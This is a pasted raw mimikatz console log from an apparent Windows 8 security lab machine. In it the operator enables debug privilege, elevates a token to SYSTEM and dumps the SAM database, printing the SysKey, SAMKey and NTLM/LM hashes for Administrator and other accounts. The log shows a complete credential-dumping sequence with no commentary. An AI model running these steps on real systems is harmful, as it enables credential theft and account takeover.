Guest User

hi chris

a guest
Oct 18th, 2019
139
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Using 'hash.txt' for logfile : OK
  2.  
  3. mimikatz # lsadump::sam
  4. Domain : SECLABWIN8
  5. SysKey : 3938d539c83d8e6a3488325151ad0c05
  6. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  7. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  8.  
  9. mimikatz # lsadump::sam
  10. Domain : SECLABWIN8
  11. SysKey : 3938d539c83d8e6a3488325151ad0c05
  12. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  13. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  14.  
  15. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  16. Domain : SECLABWIN8
  17. SysKey : 3938d539c83d8e6a3488325151ad0c05
  18. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  19. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  20.  
  21. mimikatz # token::elevate
  22. Token Id : 0
  23. User name :
  24. SID name : NT AUTHORITY\SYSTEM
  25.  
  26. 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
  27. -> Impersonated !
  28. * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
  29. * Thread Token : {0;000003e7} 0 D 34417986 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
  30.  
  31. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  32. Domain : SECLABWIN8
  33. SysKey : 3938d539c83d8e6a3488325151ad0c05
  34. Local SID : S-1-5-21-3030430307-1650540796-4004713979
  35.  
  36. SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
  37.  
  38. RID : 000001f4 (500)
  39. User : Administrator
  40. Hash LM : a14dc20682ebc0a35db15e7df7536625
  41. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  42. lm - 0: a14dc20682ebc0a35db15e7df7536625
  43. ntlm- 0: 4fd9671fef737b514356e75063f7dcac
  44. ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
  45.  
  46. RID : 000001f5 (501)
  47. User : Guest
  48.  
  49. RID : 000003e9 (1001)
  50. User : win8
  51. Hash NTLM: 00277317be7631466e6480877eedba5c
  52.  
  53. RID : 000003ea (1002)
  54. User : poweruser
  55. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  56.  
  57. RID : 000003eb (1003)
  58. User : snmp
  59. Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
  60.  
  61. mimikatz # reg save HKLM\SAM SamBkup.hiv
  62. ERROR mimikatz_doLocal ; "reg" command of "standard" module not found !
  63.  
  64. Module : standard
  65. Full name : Standard module
  66. Description : Basic commands (does not require module name)
  67.  
  68. exit - Quit mimikatz
  69. cls - Clear screen (doesn't work with redirections, like PsExec)
  70. answer - Answer to the Ultimate Question of Life, the Universe, and Everything
  71. coffee - Please, make me a coffee!
  72. sleep - Sleep an amount of milliseconds
  73. log - Log mimikatz input/output to file
  74. base64 - Switch file input/output base64
  75. version - Display some version informations
  76. cd - Change or display current directory
  77. localtime - Displays system local date and time (OJ command)
  78. hostname - Displays system local hostname
  79.  
  80. mimikatz # privilege::debug
  81. Privilege '20' OK
  82.  
  83. mimikatz # token::elevate
  84. Token Id : 0
  85. User name :
  86. SID name : NT AUTHORITY\SYSTEM
  87.  
  88. 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
  89. -> Impersonated !
  90. * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
  91. * Thread Token : {0;000003e7} 0 D 34449475 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
  92.  
  93. mimikatz # log hash.txt
  94. Using 'hash.txt' for logfile : OK
  95.  
  96. mimikatz # lsadump::sam
  97. Domain : SECLABWIN8
  98. SysKey : 3938d539c83d8e6a3488325151ad0c05
  99. Local SID : S-1-5-21-3030430307-1650540796-4004713979
  100.  
  101. SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
  102.  
  103. RID : 000001f4 (500)
  104. User : Administrator
  105. Hash LM : a14dc20682ebc0a35db15e7df7536625
  106. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  107. lm - 0: a14dc20682ebc0a35db15e7df7536625
  108. ntlm- 0: 4fd9671fef737b514356e75063f7dcac
  109. ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
  110.  
  111. RID : 000001f5 (501)
  112. User : Guest
  113.  
  114. RID : 000003e9 (1001)
  115. User : win8
  116. Hash NTLM: 00277317be7631466e6480877eedba5c
  117.  
  118. RID : 000003ea (1002)
  119. User : poweruser
  120. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  121.  
  122. RID : 000003eb (1003)
  123. User : snmp
  124. Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
  125.  
  126. mimikatz #
RAW Paste Data